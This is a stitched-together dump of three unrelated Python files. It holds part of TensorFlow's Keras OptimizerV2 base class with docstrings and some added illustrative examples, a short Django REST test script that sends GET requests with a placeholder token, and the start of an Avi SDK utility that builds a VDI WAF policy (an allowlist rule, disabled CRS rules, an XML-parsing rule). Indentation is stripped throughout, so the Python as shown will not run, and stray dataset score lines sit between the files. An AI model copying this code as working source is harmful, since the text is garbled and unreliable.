model = tf.keras.Sequential()
model.add(tf.keras.layers.Dense(num_hidden, activation='relu'))
  model.add(tf.keras.layers.Dense(num_classes, activation='sigmoid'))
loss_fn = lambda: tf.keras.losses.mse(model(input), output)
var_list_fn = lambda: model.trainable_weights
for input, output in data:
opt.minimize(loss_fn, var_list_fn)
```
### Processing gradients before applying them.
Calling `minimize()` takes care of both computing the gradients and
applying them to the variables. If you want to process the gradients
before applying them you can instead use the optimizer in three steps:
1. Compute the gradients with `tf.GradientTape`.
2. Process the gradients as you wish.
3. Apply the processed gradients with `apply_gradients()`.
Example:
```python
# Create an optimizer.
opt = tf.keras.optimizers.SGD(learning_rate=0.1)
# Compute the gradients for a list of variables.
with tf.GradientTape() as tape:
loss = <call_loss_function>
vars = <list_of_variables>
grads = tape.gradient(loss, vars)
processed_grads = [process_gradient(g) for g in grads]
grads_and_vars = zip(processed_grads, var_list)
# grads_and_vars is a list of tuples (gradient, variable). Do whatever you
# need to the 'gradient' part, for example cap them, etc.
capped_grads_and_vars = [(MyCapper(gv[0]), gv[1]) for gv in grads_and_vars]
# Ask the optimizer to apply the capped gradients.
opt.apply_gradients(capped_grads_and_vars)
```
### Use with `tf.distribute.Strategy`.
This optimizer class is `tf.distribute.Strategy` aware, which means it
automatically sums gradients across all replicas. To average gradients,
you divide your loss by the global batch size, which is done
automatically if you use `tf.keras` built-in training or evaluation loops.
See the `reduction` argument of your loss which should be set to
`tf.keras.losses.Reduction.SUM_OVER_BATCH_SIZE` for averaging or
`tf.keras.losses.Reduction.SUM` for not.
If you are not using these and you want to average gradients, you should use
`tf.math.reduce_sum` to add up your per-example losses and then divide by the
global batch size. Note that when using `tf.distribute.Strategy`, the first
component of a tensor's shape is the *replica-local* batch size, which is off
by a factor equal to the number of replicas being used to compute a single
step. As a result, using `tf.math.reduce_mean` will give the wrong answer,
resulting in gradients that can be many times too big.
### Variable Constraint
All Keras optimizers respect variable constraints. If constraint function is
passed to any variable, the constraint will be applied to the variable after
the gradient has been applied to the variable.
Important: If gradient is sparse tensor, variable constraint is not supported.
### Thread Compatibility
The entire optimizer is currently thread compatible, not thread-safe. The user
needs to perform synchronization if necessary.
### Slots
Many optimizer subclasses, such as `Adam` and `Adagrad` allocate and manage
additional variables associated with the variables to train. These are called
<i>Slots</i>. Slots have names and you can ask the optimizer for the names of
the slots that it uses. Once you have a slot name you can ask the optimizer
for the variable it created to hold the slot value.
  This can be useful if you want to log or debug a training algorithm, report stats
about the slots, etc.
### Hyper parameters
These are arguments passed to the optimizer subclass constructor
(the `__init__` method), and then passed to `self._set_hyper()`.
They can be either regular Python values (like 1.0), tensors, or
callables. If they are callable, the callable will be called during
`apply_gradients()` to get the value for the hyper parameter.
Hyper parameters can be overwritten through user code:
Example:
```python
# Create an optimizer with the desired parameters.
opt = tf.keras.optimizers.SGD(learning_rate=0.1)
# `loss` is a callable that takes no argument and returns the value
# to minimize.
loss = lambda: 3 * var1 + 2 * var2
# In eager mode, simply call minimize to update the list of variables.
opt.minimize(loss, var_list=[var1, var2])
# update learning rate
opt.learning_rate = 0.05
opt.minimize(loss, var_list=[var1, var2])
```
### Write a customized optimizer.
If you intend to create your own optimization algorithm, simply inherit from
this class and override the following methods:
- resource_apply_dense (update variable given gradient tensor is dense)
- resource_apply_sparse (update variable given gradient tensor is sparse)
- create_slots (if your optimizer algorithm requires additional variables)
- get_config (serialization of the optimizer, include all hyper parameters)
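  A minimal sketch of such a subclass (illustrative only: a plain gradient
  descent update, dense and sparse cases, no extra slots) could look like:

  ```python
  class MySGD(tf.keras.optimizers.Optimizer):
    def __init__(self, learning_rate=0.01, name="MySGD", **kwargs):
      super(MySGD, self).__init__(name, **kwargs)
      self._set_hyper("learning_rate", kwargs.get("lr", learning_rate))

    def _resource_apply_dense(self, grad, var):
      lr_t = self._decayed_lr(var.dtype.base_dtype)
      return var.assign_sub(lr_t * grad)

    def _resource_apply_sparse(self, grad, var, indices):
      lr_t = self._decayed_lr(var.dtype.base_dtype)
      return self._resource_scatter_add(var, indices, -lr_t * grad)

    def get_config(self):
      config = super(MySGD, self).get_config()
      config.update(
          {"learning_rate": self._serialize_hyperparameter("learning_rate")})
      return config
  ```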
"""
def __init__(self, name, **kwargs):
"""Create a new Optimizer.
This must be called by the constructors of subclasses.
Note that Optimizer instances should not bind to a single graph,
and so shouldn't keep Tensors as member variables. Generally
you should be able to use the _set_hyper()/state.get_hyper()
facility instead.
    This class is stateful and thread-compatible.
Args:
name: A non-empty string. The name to use for accumulators created
for the optimizer.
**kwargs: keyword arguments. Allowed to be {`clipnorm`, `clipvalue`, `lr`,
`decay`}. `clipnorm` is clip gradients by norm; `clipvalue` is clip
gradients by value, `decay` is included for backward compatibility to
allow time inverse decay of learning rate. `lr` is included for backward
compatibility, recommended to use `learning_rate` instead.
Raises:
ValueError: If name is malformed.
RuntimeError: If _create_slots has been overridden instead of
_create_vars.
"""
allowed_kwargs = {"clipnorm", "clipvalue", "lr", "decay"}
for k in kwargs:
if k not in allowed_kwargs:
raise TypeError("Unexpected keyword argument "
"passed to optimizer: " + str(k))
# checks that all keyword arguments are non-negative.
if kwargs[k] < 0:
raise ValueError("Expected {} >= 0, received: {}".format(k, kwargs[k]))
self._use_locking = True
self._name = name
self._hyper = {}
# dict: {variable name : {slot name : variable}}
self._slots = {}
self._slot_names = []
self._weights = []
self._iterations = None
# For implementing Trackable. Stores information about how to restore
# slot variables which have not yet been created
# (trackable._CheckpointPosition objects).
# {slot_name :
# {_var_key(variable_to_train): [checkpoint_position, ... ], ... },
# ... }
self._deferred_slot_restorations = {}
decay = kwargs.pop("decay", 0.0)
if decay < 0.:
raise ValueError("decay cannot be less than 0: {}".format(decay))
self._initial_decay = decay
if "clipnorm" in kwargs:
self.clipnorm = kwargs.pop("clipnorm")
if "clipvalue" in kwargs:
self.clipvalue = kwargs.pop("clipvalue")
self._hypers_created = False
def minimize(self, loss, var_list, grad_loss=None, name=None):
"""Minimize `loss` by updating `var_list`.
This method simply computes gradient using `tf.GradientTape` and calls
`apply_gradients()`. If you want to process the gradient before applying
then call `tf.GradientTape` and `apply_gradients()` explicitly instead
of using this function.
Args:
loss: A callable taking no arguments which returns the value to minimize.
var_list: list or tuple of `Variable` objects to update to minimize
`loss`, or a callable returning the list or tuple of `Variable` objects.
Use callable when the variable list would otherwise be incomplete before
`minimize` since the variables are created at the first time `loss` is
called.
grad_loss: Optional. A `Tensor` holding the gradient computed for `loss`.
name: Optional name for the returned operation.
Returns:
      An `Operation` that updates the variables in `var_list` and increments
      the optimizer's `iterations` counter.
Raises:
ValueError: If some of the variables are not `Variable` objects.
"""
grads_and_vars = self._compute_gradients(
loss, var_list=var_list, grad_loss=grad_loss)
return self.apply_gradients(grads_and_vars, name=name)
def _compute_gradients(self, loss, var_list, grad_loss=None):
"""Compute gradients of `loss` for the variables in `var_list`.
This is the first part of `minimize()`. It returns a list
of (gradient, variable) pairs where "gradient" is the gradient
for "variable". Note that "gradient" can be a `Tensor`, an
`IndexedSlices`, or `None` if there is no gradient for the
given variable.
Args:
loss: A callable taking no arguments which returns the value to minimize.
var_list: list or tuple of `Variable` objects to update to minimize
`loss`, or a callable returning the list or tuple of `Variable` objects.
Use callable when the variable list would otherwise be incomplete before
`minimize` and the variables are created at the first time when `loss`
is called.
grad_loss: Optional. A `Tensor` holding the gradient computed for `loss`.
Returns:
A list of (gradient, variable) pairs. Variable is always present, but
gradient can be `None`.
Raises:
TypeError: If `var_list` contains anything else than `Variable` objects.
ValueError: If some arguments are invalid, or var_list is None.
"""
# TODO(josh11b): Test that we handle weight decay in a reasonable way.
with backprop.GradientTape() as tape:
if not callable(var_list):
tape.watch(var_list)
loss_value = loss()
if callable(var_list):
var_list = var_list()
var_list = nest.flatten(var_list)
grads = tape.gradient(loss_value, var_list, grad_loss)
if hasattr(self, "clipnorm"):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, "clipvalue"):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
grads_and_vars = list(zip(grads, var_list))
self._assert_valid_dtypes([
v for g, v in grads_and_vars
if g is not None and v.dtype != dtypes.resource
])
return grads_and_vars
def get_gradients(self, loss, params):
"""Returns gradients of `loss` with respect to `params`.
Arguments:
loss: Loss tensor.
params: List of variables.
Returns:
List of gradient tensors.
Raises:
ValueError: In case any gradient cannot be computed (e.g. if gradient
function not implemented).
"""
params = nest.flatten(params)
with backend.get_graph().as_default():
grads = gradients.gradients(loss, params)
for grad, param in zip(grads, params):
if grad is None:
raise ValueError("Variable {} has `None` for gradient. "
"Please make sure that all of your ops have a "
"gradient defined (i.e. are differentiable). "
"Common ops without gradient: "
"K.argmax, K.round, K.eval.".format(param))
if hasattr(self, "clipnorm"):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, "clipvalue"):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
return grads
def apply_gradients(self, grads_and_vars, name=None):
"""Apply gradients to variables.
This is the second part of `minimize()`. It returns an `Operation` that
applies gradients.
Args:
grads_and_vars: List of (gradient, variable) pairs.
name: Optional name for the returned operation. Default to the name
passed to the `Optimizer` constructor.
Returns:
      An `Operation` that applies the specified gradients and increments the
      optimizer's `iterations` counter.
Raises:
TypeError: If `grads_and_vars` is malformed.
ValueError: If none of the variables have gradients.
"""
grads_and_vars = _filter_grads(grads_and_vars)
var_list = [v for (_, v) in grads_and_vars]
# Create iteration if necessary.
with ops.init_scope():
_ = self.iterations
self._create_hypers()
self._create_slots(var_list)
self._prepare(var_list)
return distribute_ctx.get_replica_context().merge_call(
self._distributed_apply, args=(grads_and_vars,), kwargs={"name": name})
def _distributed_apply(self, distribution, grads_and_vars, name):
"""`apply_gradients` using a `DistributionStrategy`."""
reduced_grads = distribution.extended.batch_reduce_to(
ds_reduce_util.ReduceOp.SUM, grads_and_vars)
var_list = [v for _, v in grads_and_vars]
grads_and_vars = zip(reduced_grads, var_list)
def apply_grad_to_update_var(var, grad):
"""Apply gradient to variable."""
if isinstance(var, ops.Tensor):
raise NotImplementedError("Trying to update a Tensor ", var)
if isinstance(grad, ops.IndexedSlices):
if var.constraint is not None:
raise RuntimeError(
"Cannot use a constraint function on a sparse variable.")
return self._resource_apply_sparse_duplicate_indices(
grad.values, var, grad.indices)
update_op = self._resource_apply_dense(grad, var)
if var.constraint is not None:
with ops.control_dependencies([update_op]):
return var.assign(var.constraint(var))
else:
return update_op
update_ops = []
with backend.name_scope(name or self._name):
for grad, var in grads_and_vars:
scope_name = ("" if ops.executing_eagerly_outside_functions() else
"_" + var.op.name)
with backend.name_scope("update" + scope_name):
update_ops.extend(
distribution.extended.update(
var, apply_grad_to_update_var, args=(grad,), group=False))
any_symbolic = any(isinstance(i, ops.Operation) or
tf_utils.is_symbolic_tensor(i) for i in update_ops)
if not context.executing_eagerly() or any_symbolic:
# If the current context is graph mode or any of the update ops are
# symbolic then the step update should be carried out under a graph
# context. (eager updates execute immediately)
with ops._get_graph_from_inputs(update_ops).as_default(): # pylint: disable=protected-access
with ops.control_dependencies(update_ops):
return self._iterations.assign_add(1).op
return self._iterations.assign_add(1)
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
grads_and_vars = list(zip(grads, params))
self._assert_valid_dtypes([
v for g, v in grads_and_vars
if g is not None and v.dtype != dtypes.resource
])
return [self.apply_gradients(grads_and_vars)]
def _set_hyper(self, name, value):
"""set hyper `name` to value. value can be callable, tensor, numeric."""
if isinstance(value, trackable.Trackable):
self._track_trackable(value, name, overwrite=True)
if name not in self._hyper:
self._hyper[name] = value
else:
prev_value = self._hyper[name]
if (callable(prev_value)
or isinstance(prev_value,
(ops.Tensor, int, float,
learning_rate_schedule.LearningRateSchedule))
or isinstance(value, learning_rate_schedule.LearningRateSchedule)):
self._hyper[name] = value
else:
backend.set_value(self._hyper[name], value)
def _get_hyper(self, name, dtype=None):
if not self._hypers_created:
self._create_hypers()
value = self._hyper[name]
if isinstance(value, learning_rate_schedule.LearningRateSchedule):
return value
if callable(value):
value = value()
if dtype:
return math_ops.cast(value, dtype)
else:
return value
def __getattribute__(self, name):
"""Overridden to support hyperparameter access."""
try:
return super(OptimizerV2, self).__getattribute__(name)
except AttributeError as e:
# Needed to avoid infinite recursion with __setattr__.
if name == "_hyper":
raise e
# Backwards compatibility with Keras optimizers.
if name == "lr":
name = "learning_rate"
if name in self._hyper:
return self._get_hyper(name)
raise e
def __setattr__(self, name, value):
"""Override setattr to support dynamic hyperparameter setting."""
# Backwards compatibility with Keras optimizers.
if name == "lr":
name = "learning_rate"
if hasattr(self, "_hyper") and name in self._hyper:
self._set_hyper(name, value)
else:
super(OptimizerV2, self).__setattr__(name, value)
def get_slot_names(self):
"""A list of names for this optimizer's slots."""
return self._slot_names
def add_slot(self, var, slot_name, initializer="zeros"):
"""Add a new slot variable for `var`."""
if slot_name not in self._slot_names:
self._slot_names.append(slot_name)
var_key = _var_key(var)
slot_dict = self._slots.setdefault(var_key, {})
weight = slot_dict.get(slot_name, None)
if weight is None:
if isinstance(initializer, six.string_types) or callable(initializer):
initializer = initializers.get(initializer)
initial_value = functools.partial(
initializer, shape=var.shape, dtype=var.dtype)
else:
initial_value = initializer
strategy = distribute_ctx.get_strategy()
with strategy.extended.colocate_vars_with(var):
weight = tf_variables.Variable(
name="%s/%s" % (var._shared_name, slot_name), # pylint: disable=protected-access
dtype=var.dtype,
trainable=False,
initial_value=initial_value)
backend.track_variable(weight)
slot_dict[slot_name] = weight
self._restore_slot_variable(
slot_name=slot_name, variable=var,
slot_variable=weight)
self._weights.append(weight)
return weight
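  # Illustrative note (not part of the original source): subclasses typically
  # call add_slot from their _create_slots hook, e.g.
  #
  #   def _create_slots(self, var_list):
  #     for var in var_list:
  #       self.add_slot(var, "momentum")
  #
  # and later fetch the slot inside _resource_apply_dense with
  # self.get_slot(var, "momentum").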
def get_slot(self, var, slot_name):
var_key = _var_key(var)
slot_dict = self._slots[var_key]
return slot_dict[slot_name]
def _prepare(self, var_list):
pass
def _create_hypers(self):
if self._hypers_created:
return
# Iterate hyper values deterministically.
for name, value in sorted(self._hyper.items()):
if isinstance(value, ops.Tensor) or callable(value):
continue
else:
self._hyper[name] = self.add_weight(
name,
shape=[],
trainable=False,
initializer=value,
aggregation=tf_variables.VariableAggregation.ONLY_FIRST_REPLICA)
self._hypers_created = True
@property
def iterations(self):
"""Variable. The number of training steps this Optimizer has run."""
if self._iterations is None:
self._iterations = self.add_weight(
"iter",
shape=[],
dtype=dtypes.int64,
trainable=False,
aggregation=tf_variables.VariableAggregation.ONLY_FIRST_REPLICA)
self._weights.append(self._iterations)
return self._iterations
@iterations.setter
def iterations(self, variable):
if self._iterations is not None:
raise RuntimeError("Cannot set `iterations` to a new Variable after "
"the Optimizer weights have been created")
self._iterations = variable
self._weights.append(self._iterations)
def _decayed_lr(self, var_dtype):
"""Get decayed learning rate as a Tensor with dtype=var_dtype."""
lr_t = self._get_hyper("learning_rate", var_dtype)
if isinstance(lr_t, learning_rate_schedule.LearningRateSchedule):
local_step = math_ops.cast(self.iterations, var_dtype)
lr_t = math_ops.cast(lr_t(local_step), var_dtype)
if self._initial_decay > 0.:
local_step = math_ops.cast(self.iterations, var_dtype)
decay_t = self._get_hyper("decay", var_dtype)
lr_t = lr_t / (1. + decay_t * local_step)
return lr_t
@abc.abstractmethod
def get_config(self):
"""Returns the config of the optimimizer.
An optimizer config is a Python dictionary (serializable)
containing the configuration of an optimizer.
The same optimizer can be reinstantiated later
(without any saved state) from this configuration.
Returns:
Python dictionary.
"""
config = {"name": self._name}
if hasattr(self, "clipnorm"):
config["clipnorm"] = self.clipnorm
if hasattr(self, "clipvalue"):
config["clipvalue"] = self.clipvalue
return config
@classmethod
def from_config(cls, config, custom_objects=None):
"""Creates an optimizer from its config.
This method is the reverse of `get_config`,
capable of instantiating the same optimizer from the config
dictionary.
Arguments:
config: A Python dictionary, typically the output of get_config.
custom_objects: A Python dictionary mapping names to additional Python
objects used to create this optimizer, such as a function used for a
hyperparameter.
Returns:
An optimizer instance.
"""
if "lr" in config:
config["learning_rate"] = config.pop("lr")
if "learning_rate" in config:
if isinstance(config["learning_rate"], dict):
config["learning_rate"] = learning_rate_schedule.deserialize(
config["learning_rate"], custom_objects=custom_objects)
return cls(**config)
def _serialize_hyperparameter(self, hyperparameter_name):
"""Serialize a hyperparameter that can be a float, callable, or Tensor."""
value = self._hyper[hyperparameter_name]
if isinstance(value, learning_rate_schedule.LearningRateSchedule):
return learning_rate_schedule.serialize(value)
if callable(value):
return value()
if tensor_util.is_tensor(value):
return backend.get_value(value)
return value
def variables(self):
"""Returns variables of this Optimizer based on the order created."""
return self._weights
@property
def weights(self):
"""Returns variables of this Optimizer based on the order created."""
return self._weights
def get_weights(self):
params = self.weights
return backend.batch_get_value(params)
# TODO(tanzheny): Maybe share this logic with base_layer.
def set_weights(self, weights):
params = self.weights
if len(params) != len(weights):
raise ValueError(
"You called `set_weights(weights)` on optimizer " + self._name +
" with a weight list of length " + str(len(weights)) +
", but the optimizer was expecting " + str(len(params)) +
" weights. Provided weights: " + str(weights)[:50] + "...")
if not params:
return
weight_value_tuples = []
param_values = backend.batch_get_value(params)
for pv, p, w in zip(param_values, params, weights):
if pv.shape != w.shape:
raise ValueError("Optimizer weight shape " + str(pv.shape) +
" not compatible with "
"provided weight shape " + str(w.shape))
weight_value_tuples.append((p, w))
backend.batch_set_value(weight_value_tuples)
def add_weight(self,
name,
shape,
dtype=None,
initializer="zeros",
trainable=None,
synchronization=tf_variables.VariableSynchronization.AUTO,
aggregation=tf_variables.VariableAggregation.NONE):
if dtype is None:
dtype = dtypes.float32
if isinstance(initializer, six.string_types) or callable(initializer):
initializer = initializers.get(initializer)
if synchronization == tf_variables.VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
variable = self._add_variable_with_custom_getter(
name=name,
shape=shape,
getter=base_layer_utils.make_variable,
overwrite=True,
initializer=initializer,
dtype=dtype,
trainable=trainable,
use_resource=True,
synchronization=synchronization,
aggregation=aggregation)
backend.track_variable(variable)
return variable
def _assert_valid_dtypes(self, tensors):
"""Asserts tensors are all valid types (see `_valid_dtypes`).
Args:
tensors: Tensors to check.
Raises:
ValueError: If any tensor is not a valid type.
"""
valid_dtypes = self._valid_dtypes()
for t in tensors:
dtype = t.dtype.base_dtype
if dtype not in valid_dtypes:
raise ValueError("Invalid type %r for %s, expected: %s." %
(dtype, t.name, [v for v in valid_dtypes]))
def _valid_dtypes(self):
"""Valid types for loss, variables and gradients.
Subclasses should override to allow other float types.
Returns:
Valid types for loss, variables and gradients.
"""
return set(
[dtypes.float16, dtypes.bfloat16, dtypes.float32, dtypes.float64])
def _call_if_callable(self, param):
"""Call the function if param is callable."""
return param() if callable(param) else param
def _resource_apply_dense(self, grad, handle):
"""Add ops to apply dense gradients to the variable `handle`.
Args:
grad: a `Tensor` representing the gradient.
handle: a `Tensor` of dtype `resource` which points to the variable to be
updated.
Returns:
An `Operation` which updates the value of the variable.
"""
raise NotImplementedError()
def _resource_apply_sparse_duplicate_indices(self, grad, handle, indices):
"""Add ops to apply sparse gradients to `handle`, with repeated indices.
Optimizers which override this method must deal with repeated indices. See
the docstring of `_apply_sparse_duplicate_indices` for details. By default
the correct behavior, to sum non-unique indices and their associated
gradients, is enforced by first pre-processing `grad` and `indices` and
passing them on to `_resource_apply_sparse`. Optimizers which deal correctly
with duplicate indices may instead override this method to avoid the
overhead of summing.
Args:
grad: a `Tensor` representing the gradient for the affected indices.
handle: a `Tensor` of dtype `resource` which points to the variable to be
updated.
indices: a `Tensor` of integral type representing the indices for which
the gradient is nonzero. Indices may be repeated.
Returns:
An `Operation` which updates the value of the variable.
"""
summed_grad, unique_indices = _deduplicate_indexed_slices(
values=grad, indices=indices)
return self._resource_apply_sparse(summed_grad, handle, unique_indices)
def _resource_apply_sparse(self, grad, handle, indices):
"""Add ops to apply sparse gradients to the variable `handle`.
Similar to `_apply_sparse`, the `indices` argument to this method has been
de-duplicated. Optimizers which deal correctly with non-unique indices may
instead override `_resource_apply_sparse_duplicate_indices` to avoid this
overhead.
Args:
grad: a `Tensor` representing the gradient for the affected indices.
handle: a `Tensor` of dtype `resource` which points to the variable to be
updated.
indices: a `Tensor` of integral type representing the indices for which
the gradient is nonzero. Indices are unique.
Returns:
An `Operation` which updates the value of the variable.
"""
raise NotImplementedError()
def _resource_scatter_add(self, x, i, v):
with ops.control_dependencies(
[resource_variable_ops.resource_scatter_add(x.handle, i, v)]):
return x.value()
def _resource_scatter_update(self, x, i, v):
with ops.control_dependencies(
[resource_variable_ops.resource_scatter_update(x.handle, i, v)]):
return x.value()
# ---------------
# For implementing the trackable interface
# ---------------
def _restore_slot_variable(self, slot_name, variable, slot_variable):
"""Restore a newly created slot variable's value."""
variable_key = _var_key(variable)
deferred_restorations = self._deferred_slot_restorations.get(
slot_name, {}).pop(variable_key, [])
# Iterate over restores, highest restore UID first to minimize the number
# of assignments.
deferred_restorations.sort(key=lambda position: position.restore_uid,
reverse=True)
for checkpoint_position in deferred_restorations:
checkpoint_position.restore(slot_variable)
def _create_or_restore_slot_variable(
self, slot_variable_position, slot_name, variable):
"""Restore a slot variable's value, possibly creating it.
Called when a variable which has an associated slot variable is created or
restored. When executing eagerly, we create the slot variable with a
restoring initializer.
No new variables are created when graph building. Instead,
_restore_slot_variable catches these after normal creation and adds restore
ops to the graph. This method is nonetheless important when graph building
for the case when a slot variable has already been created but `variable`
has just been added to a dependency graph (causing us to realize that the
slot variable needs to be restored).
Args:
slot_variable_position: A `trackable._CheckpointPosition` object
indicating the slot variable `Trackable` object to be restored.
slot_name: The name of this `Optimizer`'s slot to restore into.
variable: The variable object this slot is being created for.
"""
variable_key = _var_key(variable)
slot_dict = self._slots.get(variable_key, {})
slot_variable = slot_dict.get(slot_name, None)
if (slot_variable is None and context.executing_eagerly() and
slot_variable_position.is_simple_variable()
# Defer slot variable creation if there is an active variable creator
# scope. Generally we'd like to eagerly create/restore slot variables
# when possible, but this may mean that scopes intended to catch
# `variable` also catch its eagerly created slot variable
# unintentionally (specifically make_template would add a dependency on
# a slot variable if not for this case). Deferring is mostly harmless
# (aside from double initialization), and makes variable creator scopes
# behave the same way they do when graph building.
and not ops.get_default_graph()._variable_creator_stack): # pylint: disable=protected-access
initializer = trackable.CheckpointInitialValue(
checkpoint_position=slot_variable_position)
slot_variable = self.add_slot(
var=variable,
initializer=initializer,
slot_name=slot_name)
# Slot variables are not owned by any one object (because we don't want to
# save the slot variable if the optimizer is saved without the non-slot
# variable, or if the non-slot variable is saved without the optimizer;
# it's a dependency hypergraph with edges of the form (optimizer, non-slot
# variable, variable)). So we don't _track_ slot variables anywhere, and
# instead special-case this dependency and otherwise pretend it's a normal
# graph.
if slot_variable is not None:
# If we've either made this slot variable, or if we've pulled out an
# existing slot variable, we should restore it.
slot_variable_position.restore(slot_variable)
else:
# We didn't make the slot variable. Defer restoring until it gets created
# normally. We keep a list rather than the one with the highest restore
# UID in case slot variables have their own dependencies, in which case
# those could differ between restores.
self._deferred_slot_restorations.setdefault(
slot_name, {}).setdefault(variable_key, []).append(
slot_variable_position)
def _filter_grads(grads_and_vars):
"""Filter out iterable with grad equal to None."""
grads_and_vars = tuple(grads_and_vars)
if not grads_and_vars:
return grads_and_vars
filtered = []
vars_with_empty_grads = []
for grad, var in grads_and_vars:
if grad is None:
vars_with_empty_grads.append(var)
else:
filtered.append((grad, var))
filtered = tuple(filtered)
if not filtered:
raise ValueError("No gradients provided for any variable: %s." %
([v.name for _, v in grads_and_vars],))
if vars_with_empty_grads:
logging.warning(
("Gradients does not exist for variables %s when minimizing the loss."),
([v.name for v in vars_with_empty_grads]))
return filtered
def _var_key(var):
"""Key for representing a primary variable, for looking up slots.
In graph mode the name is derived from the var shared name.
In eager mode the name is derived from the var unique id.
If distribution strategy exists, get the primary variable first.
Args:
var: the variable.
Returns:
the unique name of the variable.
"""
# pylint: disable=protected-access
# Get the distributed variable if it exists.
if getattr(var, "_distributed_container", None) is not None:
var = var._distributed_container()
if var._in_graph_mode:
return var._shared_name
return var._unique_id
def _get_slot_key_from_var(var, slot_name):
"""Get the slot key for the variable: var_name/slot_name."""
name = _var_key(var)
return name + "/" + slot_name
class _RestoredOptimizer(OptimizerV2):
"""A non-functional Optimizer implementation for checkpoint compatibility.
Holds slot variables and hyperparameters when an optimizer is restored from a
SavedModel. These variables may be referenced in functions along with ops
created by the original optimizer, but currently we do not support using the
  optimizer object itself (e.g. through `apply_gradients`).
"""
# TODO(allenl): Make the restored optimizer functional by tracing its apply
# methods.
def __init__(self):
super(_RestoredOptimizer, self).__init__("_RestoredOptimizer")
self._hypers_created = True
def get_config(self):
# TODO(allenl): Save and restore the Optimizer's config
raise NotImplementedError(
"Restoring functional Optimzers from SavedModels is not currently "
"supported. Please file a feature request if this limitation bothers "
"you.")
revived_types.register_revived_type(
"optimizer",
lambda obj: isinstance(obj, OptimizerV2),
versions=[revived_types.VersionedTypeRegistration(
object_factory=lambda proto: _RestoredOptimizer(),
version=1,
min_producer_version=1,
min_consumer_version=1,
setter=_RestoredOptimizer._set_hyper # pylint: disable=protected-access
)])
| 1.625 | 2 |
escola/teste_get.py | danielrosendos/djangoRestFramework | 2 | 1179 | <filename>escola/teste_get.py
import requests
headers = {
'content-type': 'application/json',
'Authorization': 'Token <PASSWORD>'
}
url_base_cursos = 'http://127.0.0.1:8000/api/v2/cursos'
url_base_avaliacoes = 'http://127.0.0.1:8000/api/v2/avaliacoes'
resultado = requests.get(url=url_base_cursos, headers=headers)
assert resultado.status_code == 200 | 2.578125 | 3 |
python/avi/sdk/utils/waf_policy/vdi_waf_policy.py | aaronjwood/alb-sdk | 0 | 1180 | <gh_stars>0
# Copyright 2021 VMware, Inc.
import argparse
import json
import re
import logging
import os
import sys
from avi.sdk.avi_api import ApiSession
API_VERSION = "18.2.13"
SYSTEM_WAF_POLICY_VDI='System-WAF-Policy-VDI'
logger = logging.getLogger(__name__)
def add_allowlist_rule(waf_policy_obj):
    # add an allowlist rule that lets requests whose URI begins with /ice/ bypass WAF
allowlist_rule={
"index": 0,
"name": "allowlist-start-with-ice",
"description": "WAF will buffer the whole request body first and then release to backend. With VDI, client wants to stream data between client and server for some URLs like /ice/..., we should allow these URLs",
"actions": [
"WAF_POLICY_WHITELIST_ACTION_ALLOW"
],
"match": {
"path": {
"match_case": "SENSITIVE",
"match_str": [
"/ice/"
],
"match_criteria": "BEGINS_WITH"
}
}
}
index = 0
waf_policy_obj.setdefault("whitelist", {}).setdefault("rules", [])
for rule in waf_policy_obj["whitelist"]["rules"][:]:
if rule["name"] == "allowlist-start-with-ice":
waf_policy_obj["whitelist"]["rules"].remove(rule)
if rule["index"]>index:
index = rule["index"]
allowlist_rule["index"] = index+1
waf_policy_obj["whitelist"]["rules"].append(allowlist_rule)
def get_id_from_group(group):
    pattern = re.compile(r"[^\d]*(?P<group_id>\d\d\d)")
match = pattern.match(group["name"])
assert match, "can not extract group id from group '{}'".format(group["name"])
groupid = int(match.group("group_id"))
assert groupid == 0 or 100 <= groupid <= 999, "group id for group '{}' not in expected range".format(group["name"])
return groupid
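# Worked example (illustrative, not taken from a real policy dump): a CRS group
# named "CRS_920_PROTOCOL_ENFORCEMENT" matches the regex above with group_id
# "920", so get_id_from_group returns 920, which satisfies the range assert.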
def disable_crs_response_rules(waf_policy_obj):
#disable response side rules and some specific rules
for crs_group in waf_policy_obj.get("crs_groups", []):
group_id = get_id_from_group(crs_group)
if group_id >= 950:
crs_group["enable"] = False
for rule in crs_group.get("rules", []):
if rule["rule_id"] == "920330" or rule["rule_id"] == "932105":
rule["enable"] = False
def add_pre_crs_group(waf_policy_obj):
#add a rule to parse body as xml for requests with /broker/xml uri
xml_rule = [
{
"index": 0,
"name": "enforce XML parsing for /broker/xml",
"description": "Clients often send the wrong Content-Type header. We ignore the header and enforce the request body to be parsed as XML in WAF",
"rule": "SecRule REQUEST_METHOD \"@streq POST\" \"phase:1,id:4099822,t:none,nolog,pass,chain\" \n SecRule REQUEST_URI \"@streq /broker/xml\" \"t:none,ctl:requestBodyProcessor=XML\""
}
]
pre_crs_group = {
"index": 0,
"name": "VDI_409_ENFORCE_XML",
"rules": xml_rule
}
index = 0
if "pre_crs_groups" not in waf_policy_obj:
waf_policy_obj["pre_crs_groups"] = list()
for pre_crs in waf_policy_obj["pre_crs_groups"]:
if pre_crs["name"] == "VDI_409_ENFORCE_XML":
pre_crs["rules"] = xml_rule
pre_crs["enable"] = True
return
if pre_crs["index"] > index:
index = pre_crs["index"]
pre_crs_group["index"] = index + 1
waf_policy_obj["pre_crs_groups"].append(pre_crs_group)
def get_crs(api):
tested_crs = "CRS-2021-1"
resp = api.get("wafcrs?name=" + tested_crs)
if resp.status_code not in range(200, 300):
if resp.status_code == 404:
logger.error("Controller does not have CRS %s, please install first." % tested_crs)
return None
logger.error('Error : %s', resp.text)
exit(0)
waf_crs = json.loads(resp.text)["results"]
return waf_crs[0]
def create_vdi_waf_policy(api, args):
waf_policy_obj = {
"name": SYSTEM_WAF_POLICY_VDI,
"mode": "WAF_MODE_DETECTION_ONLY",
"waf_profile_ref": "/api/wafprofile?name=System-WAF-Profile"
}
waf_crs = get_crs(api)
if waf_crs is None:
return
waf_policy_obj["waf_crs_ref"]="/api/wafcrs?name="+waf_crs["name"]
waf_policy_obj["crs_groups"] = list()
